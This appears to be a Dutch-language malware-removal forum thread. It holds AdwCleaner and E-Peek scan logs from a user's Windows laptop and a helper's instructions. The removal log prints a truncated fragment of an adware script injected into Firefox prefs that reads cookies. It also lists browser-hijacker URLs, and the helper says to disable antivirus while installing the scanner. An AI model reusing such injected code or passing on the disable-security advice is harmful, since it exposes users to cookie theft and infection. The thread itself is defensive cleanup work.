C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\_.png->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\images\_.png.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\background.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\background.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\localStorage.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\localStorage.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\templates\menuItem.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\templates\menuItem.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\templates\search.html->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\html\templates\search.html.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\css\google.css->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\css\google.css.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\css\options.css->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\css\options.css.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\css\panel.css->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\css\panel.css.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\advcon_2_0.json->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\advcon_2_0.json.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\bing.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\bing.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\exlst.json->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\exlst.json.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\facebook.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\facebook.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\google.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\google.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\main.json->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\main.json.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\messageDispatcher.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\messageDispatcher.js.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\serpinject_2_0_661.json->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\serpinject_2_0_661.json.vir

C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\yahoo.js->C:\AdwCleaner\Quarantine\C\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja\1.6.0.30_0\config\yahoo.js.vir

De laatste scan die van adware duurde heel lang, zo lang dat het niets meer, ik heb toen maar op verwijderen geklikt en toen ging het verder.

- - - Updated - - -

en deze had ik ook nog los staan, kom ik later achter.

# AdwCleaner v3.012 - Report created 17/11/2013 at 08:53:56

# Updated 11/11/2013 by Xplode

# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)

# Username : Jordan - ACER-LAPTOP

# Running from : C:\Users\Jordan\Downloads\AdwCleaner.exe

# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

***** [ Browsers ] *****

-\\ Internet Explorer v10.0.9200.16736

-\\ Mozilla Firefox v25.0.1 (nl)

[ File : C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\7d6fgpw2.default\prefs.js ]

*************************

AdwCleaner[R0].txt - [772 octets] - [21/10/2013 07:12:57]

AdwCleaner[R1].txt - [833 octets] - [17/11/2013 08:53:05]

AdwCleaner[s0].txt - [755 octets] - [17/11/2013 08:53:56]

########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [814 octets] ##########

# AdwCleaner v4.102 - Rapport aangemaakt 30/11/2014 op 11:13:02

# Laatste Update 23/11/2014 door Xplode

# Database : 2014-11-27.1 [Live]

# Besturingssysteem : Windows 7 Ultimate Service Pack 1 (64 bits)

# Gebruikersnaam : Jordan - ACER-LAPTOP

# Gestart vanuit : C:\Users\Jordan\Desktop\adwcleaner_4.102.exe

# Optie : Verwijderen

***** [ Services ] *****

***** [ Bestanden / Mappen ] *****

Map Verwijderd : C:\ProgramData\13031386700010600142

Map Verwijderd : C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\cmaiofennmphjldldcpphcechfnnohja

***** [ Taken ] *****

***** [ Snelkoppelingen ] *****

***** [ Register ] *****

Sleutel Verwijderd : HKCU\Software\AVG Secure Search

Sleutel Verwijderd : HKCU\Software\Myfree Codec

Sleutel Verwijderd : HKLM\SOFTWARE\Myfree Codec

Sleutel Verwijderd : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00B2-0409-0000-0000000FF1CE}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17420

-\\ Mozilla Firefox v33.1 (x86 nl)

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.defaultenginename", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.defaultenginename,S", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.defaulturl", "hxxp://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q=");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.order.1", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.order.1,S", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.selectedEngine", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("browser.search.selectedEngine,S", "WebSearch");

[aksqjff7.default\prefs.js] - Regel verwijderd : user_pref("extensions.ZkREesY6Zt66B0Tr.scode", "try{(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1url.indexOf(\"warnalert11.com\")>-1url.index[...]

-\\ Comodo Dragon v

[C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\Web Data] - Verwijderd [search Provider] : hxxp://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q={searchTerms}

[C:\Users\Jordan\AppData\Local\Comodo\Dragon\User Data\Default\preferences] - Verwijderd [startup_URLs] : hxxp://websearch.searchfix.info/?unqvl=63&idate=2014/11/25

*************************

AdwCleaner[R0].txt - [772 octets] - [21/10/2013 07:12:57]

AdwCleaner[R1].txt - [3373 octets] - [17/11/2013 08:53:05]

AdwCleaner[R2].txt - [2903 octets] - [30/11/2014 10:43:33]

AdwCleaner[R3].txt - [2906 octets] - [30/11/2014 10:44:10]

AdwCleaner[R4].txt - [2964 octets] - [30/11/2014 10:53:51]

AdwCleaner[s0].txt - [3711 octets] - [17/11/2013 08:53:56]

########## EOF - C:\AdwCleaner\AdwCleaner[s0].txt - [3771 octets] ##########

[Gast Emphyrio]

Met een scan van AdwCleaner van een paar dagen terug ben ik niets. Dit geeft me geen representatief beeld.

Doe deze scan dus opnieuw en post de log.

Vervolgens...

Extra nota... Zorg ervoor dat je Security software uitschakeld is tijdens het installeren en gebruik van E-Peek.

Dit omdat deze scanners bepaalde componenten die E-Peek gebruikt, onterecht zien als geïnfecteerd en E-Peek zullen blokkeren.

Kijk hier indien je niet weet hoe je je Antivirus, Firewall en/of Antispywarescanner moet uitschakelen.

Download E-PeekSetup.exe naar je bureaublad.

Dubbelklik erop en volg de instructies.

Op het einde van de installatie, zal E-Peek opstarten.

Klik OK op het eerste scherm en vervolgens "Scan".

Post de log.

[Jordan99]

E-Peek v 1.0.5.6 © Emphyrio/Onsia Patrick 2013-2014

Downloaded @E Dev

Run at ma 1 dec 2014 17:23

.

Windows 7 Ultimate SP 1 (64 bits)

C:\Windows [NTFS - Fixed]

Default Browser: Internet Explorer

Boot mode: Normal boot

User logged in: Jordan

.

Java x86: n/a

Java x64: n/a

.

AV : AVG AntiVirus Free Edition 2015 [updated - Not Running]

AS : Windows Defender [updated - Running]

AS : AVG AntiVirus Free Edition 2015 [updated - Not Running]

FW : Windows firewall

.

==================== Files and Folders history=================================

Folders Created Last7 days :

30-11-2014 #####r-h-s-d+a- C:\Users\Jordan\AppData\Roaming\EurekaLab s.a.s

30-11-2014 #####r-h-s-d+a- C:\Program Files(x86)\Malwarebytes Anti-Malware

29-11-2014 #####r-h-s-d+a+ C:\cce_linux

28-11-2014 #####r-h-s-d+a- C:\rsit

28-11-2014 #####r-h-s-d+a- C:\ProgramData\Emsisoft

28-11-2014 #####r-h-s-d+a- C:\Program Files\trend micro

28-11-2014 #####r-h-s-d+a- C:\Program Files(x86)\Emsisoft Anti-Malware

25-11-2014 #####r-h-s-d+a- C:\ProgramData\HitmanPro

25-11-2014 #####r-h-s-d+a- C:\ProgramData\fglelgmopjjbdjgcgecdmkpfdagmmgef

25-11-2014 #####r-h-s-d+a- C:\Program Files (x86)\ESET

01-12-2014 #####r-h-s-d+a- C:\Program Files (x86)\E Dev

Files Modified Last 7days :

29-11-2014 01698222r-h-s-d-a+ C:\Windows\system32\PerfStringBackup.INI

29-11-2014 00755776r-h-s-d-a+ C:\Windows\system32\perfh013.dat

29-11-2014 00662908r-h-s-d-a+ C:\Windows\system32\perfh009.dat

29-11-2014 00185724r-h-s-d-a+ C:\Windows\system32\avgrep.txt

29-11-2014 00158514r-h-s-d-a+ C:\Windows\system32\perfc013.dat

29-11-2014 00126038r-h-s-d-a+ C:\Windows\system32\perfc009.dat

28-11-2014 00411600r-h-s-d-a+ C:\Windows\system32\FNTCACHE.DAT

27-11-2014 04443312r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerInstaller.exe

27-11-2014 00701104r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerApp.exe

27-11-2014 00071344r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

25-11-2014 00004786r-h-s-d-a+ C:\Windows\system32\.crusader

01-12-2014 00026576r-h+s-d-a+ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

01-12-2014 00026576r-h+s-d-a+ C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

01-12-2014 00000029r-h-s-d-a+ C:\Windows\SysWOW64\TempWmicBatchFile.bat

Files Created Last 7days :

29-11-2014 01938136r-h+s-d-a+ C:\Users\Jordan\AppData\Local\IconCache.db

29-11-2014 00185724r-h-s-d-a+ C:\Windows\system32\avgrep.txt

28-11-2014 00411600r-h-s-d-a+ C:\Windows\system32\FNTCACHE.DAT

28-11-2014 00109296r-h-s-d-a+ C:\Users\Jordan\AppData\Local\GDIPFONTCACHEV1.DAT

27-11-2014 04443312r-h-s-d-a+ C:\Windows\SysWOW64\FlashPlayerInstaller.exe

25-11-2014 00004786r-h-s-d-a+ C:\Windows\system32\.crusader

01-12-2014 00000109r-h-s-d-a+ C:\ProgramData\Microsoft.SqlServer.Compact.351.64.bc

==================== RUNNING PROCESSES=========================================

[AdminService] -SYSTEM- C:\Program Files (x86)\BluetoothSuite\adminservice.exe - (Qualcomm Atheros Commnucations)

[AmIcoSinglun64] -Jordan- C:\Program Files(x86)\AmIcoSingLun\AmIcoSinglun64.exe - (Alcor Micro Corp.)

[armsvc] -SYSTEM- C:\Program Files (x86)\CommonFiles\Adobe\ARM\1.0\armsvc.exe - (Adobe Systems Incorporated)

[atieclxx] -SYSTEM- C:\Windows\system32\atieclxx.exe - (AMD)

[atiesrxx] -SYSTEM- C:\Windows\system32\atiesrxx.exe - (AMD)

[avgui] -Jordan- C:\Program Files(x86)\AVG\AVG2015\avgui.exe - (AVG Technologies CZ, s.r.o.)

[avgwdsvc] -SYSTEM- C:\Program Files(x86)\AVG\AVG2015\avgwdsvc.exe - (AVG Technologies CZ, s.r.o.)

[boostSpeed] -Jordan- C:\Program Files(x86)\Auslogics\BoostSpeed\BoostSpeed.exe - (Auslogics)

[btTray] -Jordan- C:\Program Files (x86)\BluetoothSuite\BtTray.exe - (Qualcomm Atheros)

[btvStack] -Jordan- C:\Program Files (x86)\BluetoothSuite\BtvStack.exe - (Qualcomm Atheros Commnucations)

[CCleaner64] -Jordan- C:\ProgramFiles\CCleaner\CCleaner64.exe - (Piriform Ltd)

[cronsvc] -SYSTEM- C:\Prey\platform\windows\cronsvc.exe -(Fork Ltd.)

[csrss] -SYSTEM- C:\Windows\system32\csrss.exe - (MicrosoftCorporation)

[csrss] -SYSTEM- C:\Windows\system32\csrss.exe - (MicrosoftCorporation)

[ctfmon] -Jordan- C:\Windows\SysWOW64\ctfmon.exe -(Microsoft Corporation)

[CxAudMsg64] -SYSTEM- C:\Windows\system32\CxAudMsg64.exe -(Conexant Systems Inc.)

[Dropbox] -Jordan-C:\Users\Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe - (Dropbox, Inc.)

[dwm] -Jordan- C:\Windows\system32\Dwm.exe - (MicrosoftCorporation)

[E-Peek 1.0.5] -Jordan- C:\Program Files (x86)\EDev\E-Peek\E-Peek 1.0.5.exe - (E Dev)

[E-Peek 1.0.5] -Jordan- C:\Program Files (x86)\EDev\E-Peek\E-Peek 1.0.5.exe - (E Dev)

[ETDCtrl] -Jordan- C:\Program Files\Elantech\ETDCtrl.exe -(ELAN Microelectronics Corp.)

[ETDCtrlHelper] -Jordan- C:\ProgramFiles\Elantech\ETDCtrlHelper.exe - (ELAN Microelectronics Corp.)

[explorer] -Jordan- C:\Windows\Explorer.EXE - (MicrosoftCorporation)

[firefox] -Jordan- C:\Program Files (x86)\MozillaFirefox\firefox.exe - (Mozilla Corporation)

[FlashUtil64_15_0_0_239_ActiveX] -Jordan-C:\Windows\system32\Macromed\Flash\FlashUtil64_15_0_0_239_ActiveX.exe - (AdobeSystems Incorporated)

[GoogleCrashHandler] -SYSTEM- C:\Program Files(x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe - (Google Inc.)

[GoogleCrashHandler64] -SYSTEM- C:\Program Files(x86)\Google\Update\1.3.25.11\GoogleCrashHandler64.exe - (Google Inc.)

[iexplore] -Jordan- C:\Program Files (x86)\InternetExplorer\IEXPLORE.EXE - (Microsoft Corporation)

[iexplore] -Jordan- C:\Program Files (x86)\InternetExplorer\IEXPLORE.EXE - (Microsoft Corporation)

[iexplore] -Jordan- C:\Program Files\InternetExplorer\iexplore.exe - (Microsoft Corporation)

[lsass] -SYSTEM- C:\Windows\system32\lsass.exe - (MicrosoftCorporation)

[lsm] -SYSTEM- C:\Windows\system32\lsm.exe - (MicrosoftCorporation)

[psia] -SYSTEM- C:\Program Files (x86)\Secunia\PSI\PSIA.exe- (Secunia)

[searchIndexer] -SYSTEM- C:\Windows\system32\SearchIndexer.exe- (Microsoft Corporation)

[services] -SYSTEM- C:\Windows\system32\services.exe -(Microsoft Corporation)

[smss] -SYSTEM- C:\Windows\system32\smss.exe - (MicrosoftCorporation)

[spoolsv] -SYSTEM- C:\Windows\System32\spoolsv.exe -(Microsoft Corporation)

[sppsvc] -NETWORK SERVICE- C:\Windows\system32\sppsvc.exe -(Microsoft Corporation)

[sua] -SYSTEM- C:\Program Files (x86)\Secunia\PSI\sua.exe -(Secunia)

[taskeng] -Jordan- C:\Windows\system32\taskeng.exe -(Microsoft Corporation)

[taskeng] -SYSTEM- C:\Windows\system32\taskeng.exe -(Microsoft Corporation)

[taskhost] -Jordan- C:\Windows\system32\taskhost.exe -(Microsoft Corporation)

[TeamViewer_Service] -SYSTEM- C:\Program Files(x86)\TeamViewer\Version8\TeamViewer_Service.exe - (TeamViewer GmbH)

[thunderbird] -Jordan- C:\Program Files (x86)\MozillaThunderbird\thunderbird.exe - (Mozilla Corporation)

[TrustedInstaller] -SYSTEM-C:\Windows\servicing\TrustedInstaller.exe - (Microsoft Corporation)

[VirtualRouterService] -SYSTEM- C:\Program Files(x86)\Virtual Router\VirtualRouterService.exe - (Chris Pietschmann(Chris Pietschmann | husband, father, hacker, entrepreneur, futurist, innovator, autodidact))

[wininit] -SYSTEM- C:\Windows\system32\wininit.exe -(Microsoft Corporation)

[winlogon] -SYSTEM- C:\Windows\system32\winlogon.exe -(Microsoft Corporation)

[WinPatrol] -Jordan- C:\Program Files (x86)\BillPStudios\WinPatrol\WinPatrol.exe - (BillP Studios)

[WLIDSVC] -SYSTEM- C:\Program Files\Common Files\MicrosoftShared\Windows Live\WLIDSVC.EXE - (Microsoft Corp.)

[WLIDSVCM] -SYSTEM- C:\Program Files\Common Files\MicrosoftShared\Windows Live\WLIDSvcM.exe - (Microsoft Corp.)

[WmiPrvSE] -NETWORK SERVICE-C:\Windows\system32\wbem\wmiprvse.exe - (Microsoft Corporation)

[wmpnetwk] -NETWORK SERVICE- C:\Program Files\Windows MediaPlayer\wmpnetwk.exe - (Microsoft Corporation)

==================== IE PAGES==================================================

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Start Page = hxxp://www.google.nl

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Local Page = C:\Windows\system32\blank.htm

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://www.google.com

IE02 - HKCU\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://www.google.com/ie

IE03 - HKCU\Software\Microsoft\Internet Explorer\SearchUrl @Default = hxxp://www.google.com/search?q=%s

IE04 - HKCU\..\SearchScopes{0D67C3C0-B2E3-4080-A22D-914BABC18C12} @ DisplayName: [ZIE.nl (video’s)] @ URL= hxxp://www.zie.nl/search/videos/{searchTerms}&origin=nu_ie8

IE04 - HKCU\..\SearchScopes{29AC26E3-2C87-454A-A64F-C08F599A54F2} @ DisplayName: [eBay] @ URL =hxxp://rover.ebay.com/rover/1/1346-71133-23097-1/4?satitle={searchTerms}

IE04 - HKCU\..\SearchScopes{92AB0653-4D91-437C-8D9C-D05921804245} @ DisplayName: [Google] @ URL = hxxps://www.google.com/search?q={searchTerms}

IE05 - HKCU\..\URLSearchHooks @{CFBFAE00-17A6-11D0-99CB-00C04FD64497} = C:\Windows\SysWOW64\ieframe.dll

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Start Page = Google

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://go.microsoft.com/fwlink/p/?LinkId=255141

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE08 - HKLM\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE10 - HKLM\..\SearchScopes{0633EE93-D776-472f-A0FF-E1416B8B2E3A} @ DisplayName: [@ieframe.dll,-12512] @URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Start Page = hxxp://www.google.nl

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Local Page = C:\Windows\system32\blank.htm

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://www.google.com

IE02 x64 - HKCU\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://www.google.com/ie

IE03 x64 - HKCU\Software\Microsoft\InternetExplorer\SearchUrl @ Default = hxxp://www.google.com/search?q=%s

IE04 x64 - HKCU\Software\Microsoft\InternetExplorer\SearchScopes @ DefaultScope = {92AB0653-4D91-437C-8D9C-D05921804245}

IE04 x64 - HKCU\..\SearchScopes{0D67C3C0-B2E3-4080-A22D-914BABC18C12} @ DisplayName: [ZIE.nl (video’s)] @ URL= hxxp://www.zie.nl/search/videos/{searchTerms}&origin=nu_ie8

IE04 x64 - HKCU\..\SearchScopes{29AC26E3-2C87-454A-A64F-C08F599A54F2} @ DisplayName: [eBay] @ URL =hxxp://rover.ebay.com/rover/1/1346-71133-23097-1/4?satitle={searchTerms}

IE04 x64 - HKCU\..\SearchScopes {92AB0653-4D91-437C-8D9C-D05921804245}@ DisplayName: [Google] @ URL = hxxps://www.google.com/search?q={searchTerms}

IE05 x64 - HKCU\..\URLSearchHooks @{CFBFAE00-17A6-11D0-99CB-00C04FD64497} = C:\Windows\System32\ieframe.dll

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=255141

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Local Page = C:\Windows\System32\blank.htm

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Page_URL = hxxp://go.microsoft.com/fwlink/p/?LinkId=255141

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Default_Search_URL = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE08 x64 - HKLM\Software\Microsoft\Internet Explorer\Main @Search Page = hxxp://go.microsoft.com/fwlink/?LinkId=54896

IE10 x64 - HKLM\Software\Microsoft\InternetExplorer\SearchScopes @ DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE10 x64 - HKLM\..\SearchScopes{0633EE93-D776-472f-A0FF-E1416B8B2E3A} @ DisplayName: [@ieframe.dll,-12512] @URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

==================== Auto Load=================================================

AL00 - HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon @ Userinit = userinit.exe,

AL00 - HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon @ Shell = explorer.exe

AL00 x64 - HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon @ Userinit = C:\Windows\system32\userinit.exe,

AL00 x64 - HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon@ Shell = explorer.exe

==================== Firefox===================================================

FF - ProfilePath -C:\Users\Jordan\AppData\Roaming\Mozilla\firefox\Profiles\aksqjff7.default

FF - Ext: [YouTube Video Downloader (Lite) 0.1.5 ] -extension - cccc5f0d-b9d0-4314-88b5-7e27551f9e84@jetpack visible: True active:True

FF - Ext: [Default 33.1 ] - theme -{972ce4c6-7e08-4474-a285-3208198ce6fd} visible: True active: True

FF - Ext: [buyNsave 3.64 ] - extension - O@bHpatKv.com visible:True active: True

FF - PlugIn: [Adobe® Flash® Player 15.0.0.239 Plugin] -C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll

==================== Windows Host File=========================================

==================== BHO =======================================================

BHO - [Groove GFS Browser Helper] -{72853161-30C5-4D22-B7F9-0BBC1D38A37E} @ Default = C:\Program Files(x86)\Microsoft Office\Office12\GrooveShellExtensions.dll

BHO - [Aanmeldhulp voor Microsoft-account] - {9030D464-4C02-4ABF-8ECC-5164760863C6}@ Default = C:\Program Files (x86)\Common Files\Microsoft Shared\WindowsLive\WindowsLiveLogin.dll

BHO x64 - [CIESpeechBHO Class] -{8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} @ Default = C:\Program Files(x86)\Bluetooth Suite\IEPlugIn.dll

BHO x64 - [Windows Live ID Sign-in Helper] -{9030D464-4C02-4ABF-8ECC-5164760863C6} @ Default = C:\Program Files\CommonFiles\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

==================== Auto Start Programs =======================================

ASP01 - HKLM\..\Run @ AVG_UI = "C:\Program Files(x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

ASP04 - HKCU\..\Run @ CCleaner Monitoring = "C:\ProgramFiles\CCleaner\CCleaner64.exe" /MONITOR

ASP04 - HKCU\..\Run @ SmAudio = C:\Program Files\Conexant\SmartAudio\SmAudio.exe-c

ASP04 - HKCU\..\Run @ WinPatrol = C:\Program Files(x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot

ASP01 x64 - HKLM\..\Run @ AVG_UI = "C:\Program Files(x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

ASP04 x64 - HKCU\..\Run @ CCleaner Monitoring ="C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR

ASP04 x64 - HKCU\..\Run @ SmAudio = C:\ProgramFiles\Conexant\SmartAudio\SmAudio.exe -c

ASP04 x64 - HKCU\..\Run @ WinPatrol = C:\Program Files(x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot

ASP - Startup -C:\Users\Jordan\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\desktop.ini

ASP - Startup -C:\Users\Jordan\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\Dropbox.lnk

ASP - CommonStartup - C:\ProgramData\Microsoft\Windows\StartMenu\Programs\Startup\desktop.ini

==================== Extra Items IE============================================

EI03 - Adv Opt -HKLM\..\AdvancedOptions\ACCELERATED_GRAPHICS @ Text = Accelerated graphics

EI03 - Adv Opt - HKLM\..\AdvancedOptions\ACCESSIBILITY @Text = Accessibility

EI03 - Adv Opt - HKLM\..\AdvancedOptions\BROWSE @ Text =Browsing

EI03 - Adv Opt - HKLM\..\AdvancedOptions\CRYPTO @ Text =Security

EI03 - Adv Opt - HKLM\..\AdvancedOptions\HTTP @ Text = HTTPsettings

EI03 - Adv Opt - HKLM\..\AdvancedOptions\INTERNATIONAL @Text = International

EI03 - Adv Opt - HKLM\..\AdvancedOptions\MULTIMEDIA @ Text =Multimedia

EI03 x64 - Adv Opt -HKLM\..\AdvancedOptions\ACCELERATED_GRAPHICS @ Text = Accelerated graphics

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\ACCESSIBILITY @Text = Accessibility

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\BROWSE @ Text =Browsing

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\CRYPTO @ Text =Security

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\HTTP @ Text =HTTP settings

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\INTERNATIONAL @Text = International

EI03 x64 - Adv Opt - HKLM\..\AdvancedOptions\MULTIMEDIA @Text = Multimedia

==================== Internet Default Prefix ===================================

IDP00 - Default -HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix @ Default =http://

IDP01 - WWW -HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes @ WWW = http://

IDP00 x64 - Default - HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix@ Default = http://

